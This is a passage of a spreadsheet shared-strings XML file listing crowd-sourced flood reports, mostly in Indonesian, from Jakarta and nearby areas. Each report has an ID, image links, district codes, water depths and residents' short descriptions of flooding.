    <t>https://images.petabencana.id/4c4d2dfb-f890-4b8a-905b-19a04a88dbb6.jpg</t>
  </si>
  <si>
    <t>Cikokol</t>
  </si>
  <si>
    <t>79ca7e26-6c9c-4554-8689-19e411c32fc6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/79ca7e26-6c9c-4554-8689-19e411c32fc6.jpg</t>
  </si>
  <si>
    <t>Cipondoh Indah</t>
  </si>
  <si>
    <t>e8b2c9c1-a988-4b9c-9798-2ad42bc85b10</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e8b2c9c1-a988-4b9c-9798-2ad42bc85b10.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "121", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di jalan Kresek Raya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/vIFGbyVdoLm2cRs4zBgJ_T2k3eaIwkmGKea-CjO3OOOtM7OJgrEE_iBNiM037mrmPZgEMVxx3mB2ytMRyamewuj1HB2G5wm4ms4rjReQ_w=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1223", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan tergenang air tolong di TL</t>
  </si>
  <si>
    <t>Lagoa</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/JFUM9XvniwU94DWHVED3LRrLOGv49o9jQ8-RrpZsSFKWkHJy7TkXbVM7fiWVJuVlHItOCMcYH9gdCVnP76m6Irsgdgc05UqYjPZjR7-s4W8=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2231", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>tolong di TL Jalan tergenang air hujan got  banyak yang mampet</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ahDoepYvBlKt9Ul6-k5bGiLHsf7n7hcG2N8fFgeCKrsbUyVgRxxVfcFTBN80DDdT55W1C7-D_9KwHellATk3hsNjhEDJrSfchKVyox7E=s480-c</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/SaTKxfj_zISDsBMpSpMwtaHOnTdsfh25lqvFxD0_tH6zoNsGSs_oee7dAhBX-BAzbNb2VL-wyLZtewPElbx3JwASCrNjFsxEGmmK7zjm=s480-c</t>
  </si>
  <si>
    <t>Gang Ambon RT 02 RW 06 Kel Kamal Kec. Kalideres Jakarta barat banyak rumah penduduk kebanjiran Mohon bantuan pompa kepada yg terkait. Tks"</t>
  </si>
  <si>
    <t>019ab4d2-8f24-4f7c-83ee-08fd902ff9ce</t>
  </si>
  <si>
    <t>https://images.petabencana.id/019ab4d2-8f24-4f7c-83ee-08fd902ff9ce.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "976", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>RT. 005 RW 05 Kel. Duri Kosambi</t>
  </si>
  <si>
    <t>30587592-2c56-4d01-a5b8-6fa7637349ee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/30587592-2c56-4d01-a5b8-6fa7637349ee.jpg</t>
  </si>
  <si>
    <t>Air buangan dari Waduk di Perumahan Bojong Indah sudah sejajar dgn air di sungai kalideres (Daan Mogot(</t>
  </si>
  <si>
    <t>2a57b14a-e626-4e8e-8fc7-46b6269bd87c</t>
  </si>
  <si>
    <t>Tinggi air sebetis.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xdvI7CcMnjaebABtwdBtSKOVHnZfqbcrQowKwymrsYD9zLmUec2GES4iHypjHZmY5saHmNJ4g3juCn5x5T_c6tCuWdNp7EYdnXzbmUO8Bi4=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil di rt 01/03. Tolong di atasi</t>
  </si>
  <si>
    <t>305577b6-f42b-44b1-8df8-e56eedde203e</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "1132", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Ya banjir ini.</t>
  </si>
  <si>
    <t>c7a61ac2-9460-4afd-80c6-d3725f0ac653</t>
  </si>
  <si>
    <t>Banjir selutut di poris</t>
  </si>
  <si>
    <t>1c236ad2-62cf-45e9-87fe-5df23d13c71e</t>
  </si>
  <si>
    <t>3ada7909-0e06-42a9-9201-c44fa510dc9d</t>
  </si>
  <si>
    <t>Mohon pusat dan provinsi pinjamkan pompa untuk bantu sedot air.</t>
  </si>
  <si>
    <t>Kandangpanjang</t>
  </si>
  <si>
    <t>9c79d815-6101-4eef-bdab-1202ede8a1c9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9c79d815-6101-4eef-bdab-1202ede8a1c9.jpg</t>
  </si>
  <si>
    <t>Tidak bisa di lewati para pengendara motor</t>
  </si>
  <si>
    <t>6311fe2d-ca15-4e6f-9044-d43a3f0c693c</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 3, "condition": 0 }</t>
  </si>
  <si>
    <t>Kendaraan Roda 4 Sedang (SUV)</t>
  </si>
  <si>
    <t>fe957ae2-049e-443d-950d-bcfa116ba78a</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2584", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di kali pedongkelan</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357908</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/02/17/1613560509586676643.jpg</t>
  </si>
  <si>
    <t>Kampung Dongeng Hibur Anak-anak Korban Banjir di Jombang</t>
  </si>
  <si>
    <t>Anak-anak terdampak banjir di Jombang mendapat hiburan dari "Kampung Dongeng".</t>
  </si>
  <si>
    <t>3bf30077-ab34-462f-85c8-93f3c5077a7d</t>
  </si>
  <si>
    <t>High winds, causing some trees to fall over</t>
  </si>
  <si>
    <t>dae2e755-746c-4f93-ab29-dc8ddec980ce</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dae2e755-746c-4f93-ab29-dc8ddec980ce.jpg</t>
  </si>
  <si>
    <t>Flood</t>
  </si>
  <si>
    <t>Panjang Baru</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lwucmk-XVgYwRDU5k3KL-wnmLM4obtWtz2sPaWK941Bcp9tR7OnzCI7qm808pfb84hAnOe2VzCmX8XkV3LD54L6mVAimceJcMl2v4Q-j=s480-c</t>
  </si>
  <si>
    <t>JALAN BANGKA IX C</t>
  </si>
  <si>
    <t>b7b5c091-b82e-43c3-acce-e9af22894ad4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b7b5c091-b82e-43c3-acce-e9af22894ad4.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 68, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1210", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pancoran barat X, rumah dah ditinggin, tapi jalan sepinggang</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/9TwkFDDLDumVa8LaoGQTqVF4SlQCqnczejYNfnDIeQ5ZqDs0NeP9P_QPsB5siZunacAgAVbsHo9r_tBA9Gj2yLR2vtWX1hfQ2BVbBybE8g=s480-c</t>
  </si>
  <si>
    <t>got nya gak jalan.mampet</t>
  </si>
  <si>
    <t>c74957bb-ca2d-4c32-8113-b7955f6f16a7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c74957bb-ca2d-4c32-8113-b7955f6f16a7.jpg</t>
  </si>
  <si>
    <t>Komplek PLN Klender genangan air 15cm</t>
  </si>
  <si>
    <t>c23dd9b0-868a-4343-9518-95a2f458d818</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c23dd9b0-868a-4343-9518-95a2f458d818.jpg</t>
  </si>
  <si>
    <t>Komplek pln</t>
  </si>
  <si>
    <t>376cb586-a8a9-4d1c-bb98-0d02df44ba77</t>
  </si>
  <si>
    <t>https://images.petabencana.id/376cb586-a8a9-4d1c-bb98-0d02df44ba77.jpg</t>
  </si>
  <si>
    <t>2c4e57ea-b2cf-4e08-a8f0-ab8c70aa76db</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2c4e57ea-b2cf-4e08-a8f0-ab8c70aa76db.jpg</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357924</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/02/18/357924-16136357251102988451.mp4-03.jpg</t>
  </si>
  <si>
    <t>Hujan Deras, Genangan Air Merendam Jalan Tanjung Duren Raya</t>
  </si>
  <si>
    <t>Akibat hujan deras, air menggenangi di depan pemadam kebakaran Tanjung Duren.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357925</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/02/18/357925-16136370691094506108.mov-03.jpg</t>
  </si>
  <si>
    <t>Hujan Deras Membuat Jalan Kapten Tendean Terendam Banjir</t>
  </si>
  <si>
    <t>Diguyur hujan deras, kawasan Jalan Kapten Tendean di sekitar Gedung Trans TV tepatnya di depan Griya Mandiri Mampang banjir. Beberapa jam sebelumnya sekitar jam 14.00 WIB, pejalan kaki sempat kesulitan karena trotoar di kawasan tersebut juga rata dengan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/TpzG2RvyeQQ4C_TgyFe_eXkpb9_38c8X4efLRVodE7hTnWjo7lBanV2PHZ4Oq_OsxI6P7eak6ixNvB0s59wbbjgUZrgT0AuWGW_mFn6lZy8=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1594", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil tpu bambu apus blok 4 tergenang. Tolong di atasi</t>
  </si>
  <si>
    <t>eeb0517c-a8bf-46a7-9c5b-a6c0de533872</t>
  </si>
  <si>
    <t>https://images.petabencana.id/eeb0517c-a8bf-46a7-9c5b-a6c0de533872.jpg</t>
  </si>
  <si>
    <t>Banjir di aliran kali Krukut</t>
  </si>
  <si>
    <t>f426e689-d68d-46ae-8ad0-771a7836b41e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f426e689-d68d-46ae-8ad0-771a7836b41e.jpg</t>
  </si>
  <si>
    <t>Stasiun Tebet tergenang di bagian Rel-nya, Gangguan terhadap jadwal KRL.</t>
  </si>
  <si>
    <t>c0847428-d058-4aaa-916e-40cf5c558e42</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c0847428-d058-4aaa-916e-40cf5c558e42.jpg</t>
  </si>
  <si>
    <t>Banjir kali Krukut</t>
  </si>
  <si>
    <t>95bb5ba0-4b2c-49a9-b069-44491dc8fa5c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/95bb5ba0-4b2c-49a9-b069-44491dc8fa5c.jpg</t>
  </si>
  <si>
    <t>Kampung aliran kali Krukut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/hYp6K6VfUb-I5gyp60DfAlFJLtFk9wqmar3oRHVMED74sSydIgnofQJZMm_pMM1DZtEBPFVbu1UEmwijy6dOq4nf9EJujAs6UVFgd7mreg=s480-c</t>
  </si>
  <si>
    <t>tolong di TL Jalan tergenang air hujan</t>
  </si>
  <si>
    <t>83d83002-51b6-479f-a2fd-9027d3be9c51</t>
  </si>
  <si>
    <t>https://images.petabencana.id/83d83002-51b6-479f-a2fd-9027d3be9c51.jpg</t>
  </si>
  <si>
    <t>Kergon</t>
  </si>
  <si>
    <t>b1b1828e-029c-4a6f-9578-c9e975cf4ea8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b1b1828e-029c-4a6f-9578-c9e975cf4ea8.jpg</t>
  </si>
  <si>
    <t>Air genanh 30cm</t>
  </si>
  <si>
    <t>55610dff-ca4f-4227-b8af-a79582f2915d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/55610dff-ca4f-4227-b8af-a79582f2915d.jpg</t>
  </si>
  <si>
    <t>Genangan air mulai tinggi</t>
  </si>
  <si>
    <t>8283edd7-8bc1-4f98-a284-7de391e65dcc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8283edd7-8bc1-4f98-a284-7de391e65dcc.jpg</t>
  </si>
  <si>
    <t>Banjir di depan rumah kira2 di bawah betis. sekitar rumah agak tinggi, gang belakang rumah air sudah selutut dan memasuki rumah warga</t>
  </si>
  <si>
    <t>61228116-f208-4938-8d88-f304eb52e54f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/61228116-f208-4938-8d88-f304eb52e54f.jpg</t>
  </si>
  <si>
    <t>Genangan air mulai masuk ke dalam rumah</t>
  </si>
  <si>
    <t>59b892ea-e4d0-4905-b1b1-e9f3fae38722</t>
  </si>
  <si>
    <t>https://images.petabencana.id/59b892ea-e4d0-4905-b1b1-e9f3fae38722.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1715", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>bajir di pemukiman sekitar jalur BKT pondok kopi. Setiap hujan deras pasti banjir..</t>
  </si>
  <si>
    <t>64bb8f18-5a98-4847-a827-b0076062cf01</t>
  </si>
  <si>
    <t>https://images.petabencana.id/64bb8f18-5a98-4847-a827-b0076062cf01.jpg</t>
  </si>
  <si>
    <t>Genangan 30-50 cm di Jl. Bulak Barat II Klender Duren Sawit Jakarta Timur</t>
  </si>
  <si>
    <t>ff8c5be3-f669-4821-ad8c-202ab68e56a8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ff8c5be3-f669-4821-ad8c-202ab68e56a8.jpg</t>
  </si>
  <si>
    <t>Air mulai masuk ke rumah warga</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/gneuPglJcow0vgM6hryi6BSb1S_7jyxSpzgBF3JVpPYAqN8RJ4kvfs_6VtApeH7X1TO7k_NE3C9W7Uv_iyLavR88JN849EH0tDWLAW_M7-4=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1708", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir rendam pemukiman RT 5 RW 012 Pondok Kelapa Selatan Dalam 3, Pondok Kelapa, Duren Sawit, Jakarta Timur 13450, , air mencapai 0.5 mter dan masuk ke rumah #KerukKali #SampahDiSaluran #SampahDiKali #SaluranTersumbat</t>
  </si>
  <si>
    <t>0b327b72-68e0-4e53-a186-3d8c35cb2cef</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0b327b72-68e0-4e53-a186-3d8c35cb2cef.jpg</t>
  </si>
  <si>
    <t>tinggi air sudah di atas mata kaki</t>
  </si>
  <si>
    <t>c98e08c6-be94-4123-ace1-a370d9d93258</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c98e08c6-be94-4123-ace1-a370d9d93258.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1445", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir dipemukiman padat daerah Penggilingan, sebagai rumah ad yg terendam &amp; sebagian ad yg tidak terendam...</t>
  </si>
  <si>
    <t>dfd8bca8-aa2e-4dac-9199-11b6f9a7e592</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dfd8bca8-aa2e-4dac-9199-11b6f9a7e592.jpg</t>
  </si>
  <si>
    <t>Banjir di salah satu perumahan daerah bintara, bekasi barat.</t>
  </si>
  <si>
    <t>e3819554-840f-48f7-bc5a-f457eb53c10a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e3819554-840f-48f7-bc5a-f457eb53c10a.jpg</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/pTIaQFHZK21Szwm2TWGwUmaslnNaZn34YWRm-evimkp9hN_jtXxEnZFr9D8tsHffTgmyZBlr7JM2zCTve2wsMrAw93MjysUOC7UML4Vyzw=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil #BanjirBandang #BanjirKiriman  banjir trusssssssssssss dari taun ke taun ga berubah</t>
  </si>
  <si>
    <t>8b158541-e5ce-48dc-a034-7a8964699d81</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8b158541-e5ce-48dc-a034-7a8964699d81.jpg</t>
  </si>
  <si>
    <t>Banjir kurang lebih 50 cm</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Xppze2TEipxsrAMuAQ1tGyF4i-Gbb9mFExkKeJUhWjjc4iTDpSHTmWzhwFcHyH3kJlrbpOkzIFxefYPg1huDVL8Z0LDwSDLV_crh28Yq8jE=s480-c</t>
  </si>
  <si>
    <t>baru surut td malam, sdh banjir lagi, deket jalan sd inpres, kelurahan rambutan, kec ciracas, mohon solusinya. #KerukKali</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/eRsFeSnvyGTn6Ojcz-DSNSUZYRmUBzdZS68Z4oSRIG_4FJO1QBlgWaYOy1H4tKCVC449FobPsy6SxavbOW4yea1ADwMJEI_BlBEp6VFVjg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1623", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>511a48be-b2ae-415e-9530-43ae3fd9b254</t>
  </si>
  <si>
    <t>Didalam rumah sebetis dewasa</t>
  </si>
  <si>
    <t>90a4133e-49b7-49a2-800b-b1d20405fff9</t>
  </si>
  <si>
    <t>Banjir di jl. Dato tonggara v</t>
  </si>
  <si>
    <t>8861ac13-fdfb-4ec3-9019-b8c945eebaae</t>
  </si>
  <si>
    <t>Genangan air semakin naik dan masuk ke rumah warga,</t>
  </si>
  <si>
    <t>d1ab167f-6474-461d-b71d-06d4a2e15580</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d1ab167f-6474-461d-b71d-06d4a2e15580.jpg</t>
  </si>
  <si>
    <t>ef73f1de-2189-4b4d-8fdc-d2c1c3cc48ed</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ef73f1de-2189-4b4d-8fdc-d2c1c3cc48ed.jpg</t>
  </si>
  <si>
    <t>ad65bbd4-fcac-431d-bfb6-06fd5cfb5d38</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ad65bbd4-fcac-431d-bfb6-06fd5cfb5d38.jpg</t>
  </si>
  <si>
    <t>Mobil dan motor tidak mungkin bisa lewat, listrik  mungkin akan dipadamkan</t>
  </si>
  <si>
    <t>4fc8cfb0-01f8-4424-a2dd-76e5f69242b4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4fc8cfb0-01f8-4424-a2dd-76e5f69242b4.jpg</t>
  </si>
  <si>
    <t>68de790f-4429-4e23-9692-5ce38a5ad391</t>
  </si>
  <si>
    <t>https://images.petabencana.id/68de790f-4429-4e23-9692-5ce38a5ad391.jpg</t>
  </si>
  <si>
    <t>Banjir di jl kerja bakti skadron halim arah depnaker pinang ranti</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/o2QwAtNvbA_3h25nqwGPPa8HPcN10G23CIrLvZAzsYNw3SVyp18n5uy6mJ1jOg4ybzGYQwduP6tgzr45-7G2jqeo77cGDncwQRzzS1jbHw=s480-c</t>
  </si>
  <si>
    <t>Warga RT01/RW04 Cipinang Melayu  kebanjiran dikarenakan curah hujan yang tinggi dan banjir  kiriman ketinggian sudah mencapai sedada orang dewasa  #KaliMeluap#BanjirBandang #BanjirKiriman</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Am_LS9ZRCBJzk3-Qn7ND_I3R3sxmmccyhbQBdlownIA01w0_Vxcwltp429ZL8-MBtSnsuSmya98SSpYpKdetK05Qn0ndWeUn_NwLRurc=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1463", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#SaluranTersumbat #SaluranKotor</t>
  </si>
  <si>
    <t>70bcdb98-f5de-4b07-a891-51761c047092</t>
  </si>
  <si>
    <t>https://images.petabencana.id/70bcdb98-f5de-4b07-a891-51761c047092.jpg</t>
  </si>
  <si>
    <t>Air masih terus naik,hujan masih turun.rumah ketinggian 80cm dari jalan.</t>
  </si>
  <si>
    <t>1d40795f-decc-49e6-9011-df582a7bf532</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1d40795f-decc-49e6-9011-df582a7bf532.jpg</t>
  </si>
  <si>
    <t>{ "points": -2, "flood_depth": 80, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir aliran sungai Krukut</t>
  </si>
  <si>
    <t>4185cf8e-234d-4152-8748-56ca40294d38</t>
  </si>
  <si>
    <t>Komp. AL jatibening pondokgede kota bekasi</t>
  </si>
  <si>
    <t>678a0b91-fdde-409d-832f-176d4277c3d9</t>
  </si>
  <si>
    <t>Tanjung priok</t>
  </si>
  <si>
    <t>c372d14a-3517-4522-9129-80cdf4ca690e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c372d14a-3517-4522-9129-80cdf4ca690e.jpg</t>
  </si>
  <si>
    <t>40b0baed-e219-4213-954d-56e0c927eba4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/40b0baed-e219-4213-954d-56e0c927eba4.jpg</t>
  </si>
  <si>
    <t>Jalan Bintara raya depan pom bensin bintara, arah kranji. Akses jalan sulit utk dilewati.</t>
  </si>
  <si>
    <t>390b585b-5746-443c-95d1-3724760a67b2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/390b585b-5746-443c-95d1-3724760a67b2.jpg</t>
  </si>
  <si>
    <t>Banjir Pinggang Hingga Dada Orang Dewasa</t>
  </si>
  <si>
    <t>2532c325-8c33-4870-b7d0-cd92cb624c2e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2532c325-8c33-4870-b7d0-cd92cb624c2e.jpg</t>
  </si>
  <si>
    <t>Komplek Essence Park</t>
  </si>
  <si>
    <t>1e5d0e8a-a40a-484b-aeb6-825e1f2416cc</t>
  </si>
  <si>
    <t>Cipinang melayu rt 009/rw 011 banjir 70-80 cm</t>
  </si>
  <si>
    <t>8f93ae29-4a51-48a1-8219-ec66135a3f42</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8f93ae29-4a51-48a1-8219-ec66135a3f42.jpg</t>
  </si>
  <si>
    <t>519d695c-87ff-47fa-98aa-fa8c4b057ae2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/519d695c-87ff-47fa-98aa-fa8c4b057ae2.jpg</t>
  </si>
  <si>
    <t>Jl. Kuningan Barat 1</t>
  </si>
  <si>
    <t>f62389b1-1df5-4489-8e0a-4cc9a3513405</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f62389b1-1df5-4489-8e0a-4cc9a3513405.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1878", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>f3e13cc6-573b-4dda-b017-108d28dc3e52</t>
  </si>
  <si>
    <t>Alhakim hotel</t>
  </si>
  <si>
    <t>d9e1b3d5-2682-43c0-b6da-f7fde519dde6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d9e1b3d5-2682-43c0-b6da-f7fde519dde6.jpg</t>
  </si>
  <si>
    <t>Banjir di wilayah pemukiman warga RW 08 Kel Sepanjang jaya Kec Rawa Lumbu Bekasi kota setinggi 70 cm, listrik dan air PAM tidak berfungsi</t>
  </si>
  <si>
    <t>873d7d35-32af-4e54-b656-2d865ff8fe1d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/873d7d35-32af-4e54-b656-2d865ff8fe1d.jpg</t>
  </si>
  <si>
    <t>Banjir ini langganan, tiap musim hujan, tolong penanganan pemerintah</t>
  </si>
  <si>
    <t>db69d584-9e14-47be-b9c2-614e58e2ebcb</t>
  </si>
  <si>
    <t>WARNING. Prediksi bisa lebih</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357949</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/02/19/357949-16137091601466371056.mov-03.jpg</t>
  </si>
  <si>
    <t>Rawalumbu Langganan Banjir, Warga Sudah 'Terbiasa'</t>
  </si>
  <si>
    <t>Diguyur hujan dari pukul 02:00 WIB, Rawalumbu Jembatan 3 Bekasi terendam banjir, ketinggian air di atas 50 cm. Devi Yan Permana, seorang warga yang menjadi korban banjir menceritakan bahwa kawasan rumahnya menjadi langganan banjir, ''di sini tuh kalo uja</t>
  </si>
  <si>
    <t>173d5705-6467-40cc-82d9-5064a67ba072</t>
  </si>
  <si>
    <t>https://images.petabencana.id/173d5705-6467-40cc-82d9-5064a67ba072.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-SG" }</t>
  </si>
  <si>
    <t>Mohon pemerintah bantuannya untuk penanganan banjir di pekalongn, khususnya di pekalongan utara</t>
  </si>
  <si>
    <t>Mawasangka</t>
  </si>
  <si>
    <t>Buton</t>
  </si>
  <si>
    <t>Sulawesi Tenggara</t>
  </si>
  <si>
    <t>19aa8703-f132-4aee-bf34-e7eacf0831e3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/19aa8703-f132-4aee-bf34-e7eacf0831e3.jpg</t>
  </si>
  <si>
    <t>Banjir kiriman yang diakibatkan oleh luapan kali jambe</t>
  </si>
  <si>
    <t>54d3637e-5405-44c0-a201-34b34c97fa76</t>
  </si>
  <si>
    <t>https://images.petabencana.id/54d3637e-5405-44c0-a201-34b34c97fa76.jpg</t>
  </si>
  <si>
    <t>Banjir terjadi sejak jam 3 dinihari,ketinggian air sebatas betis orang dewasa +-30-35 cm</t>
  </si>
  <si>
    <t>92234c7e-c0cf-4e47-bf11-f6edc541356c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1818", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Kecamatan Makasar, Halim Perdanakusuma. Tidak menggenang jalan utama.</t>
  </si>
  <si>
    <t>a3ba2203-31df-4abd-a7dc-50f0b3d95674</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a3ba2203-31df-4abd-a7dc-50f0b3d95674.jpg</t>
  </si>
  <si>
    <t>18:16 banjirasih diatas lutut orang dewasa, kendaraan tidak bisa melintas</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/pJpoRUT_8oqXBCsfJBlW5Dbblw8Uj_Awlnwh75sW87dJRQGDZyGfiq2g9S9BUkVH95TKq9w7KUYYw9D5DnW9wIGSrGfmPhI6SNpfLy109bU=s480-c</t>
  </si>
  <si>
    <t>Jalan terendam air hujan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lQsfw1yf4bDt7etVCKCEyBWoHAhvsXAdVdrEi1gTXps19XlBiWdxIB2EBz7szr2aCaMxyAkp7nHyIlCK16jLDQttGrZ_rQ3IBXPD3w-c=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1261", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>df9af68c-a8f3-4414-b1d4-577fa0fa0cbd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/df9af68c-a8f3-4414-b1d4-577fa0fa0cbd.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 91, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1224", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jln. H. Asnawi 90cm ++</t>
  </si>
  <si>
    <t>31ecd81d-2333-4e4a-b5ad-f84a9cd50c68</t>
  </si>
  <si>
    <t>https://images.petabencana.id/31ecd81d-2333-4e4a-b5ad-f84a9cd50c68.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1142", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Jl. Kemang 1E, Kec. Bangka, Kel.Mampang prapatan (belakang lippo mall Kemang)</t>
  </si>
  <si>
    <t>c292f328-cfd8-4c12-8cc5-60485262b3e2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c292f328-cfd8-4c12-8cc5-60485262b3e2.jpg</t>
  </si>
  <si>
    <t>Gerbang depan Komplek Kemang Utara No. 42</t>
  </si>
  <si>
    <t>23ac3769-d855-4edc-9735-80a53dae833c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/23ac3769-d855-4edc-9735-80a53dae833c.jpg</t>
  </si>
  <si>
    <t>Banjir di kavling rambutan</t>
  </si>
  <si>
    <t>29636091-c814-44c3-b4ad-02da69c95ec8</t>
  </si>
  <si>
    <t>Lengkong Gudang Timur</t>
  </si>
  <si>
    <t>Serpong</t>
  </si>
  <si>
    <t>3dde349c-189f-4c50-896b-b2cb2972e19d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3dde349c-189f-4c50-896b-b2cb2972e19d.jpg</t>
  </si>
  <si>
    <t>Jalan di dalam komplek kemang utara no. 42</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Ah8DJJfbx6Y3ZLjQOI0DyA5UPepjECx_mJWTg4qkDhKhDU2S7leMQueCsnz0l_18YQWWkFKE97ZSkIMZhVoIMdEBpW-2zyF9SsGur31i8w=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1106", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kebayoran Lama Utara</t>
  </si>
  <si>
    <t>e3d171af-ff20-4945-8c26-8763ef1244ca</t>
  </si>
  <si>
    <t>Banjir di cip melayu rt 009/rw 011 naik lebih cepat dibanding kemarin..mohon bantuan unit terkait</t>
  </si>
  <si>
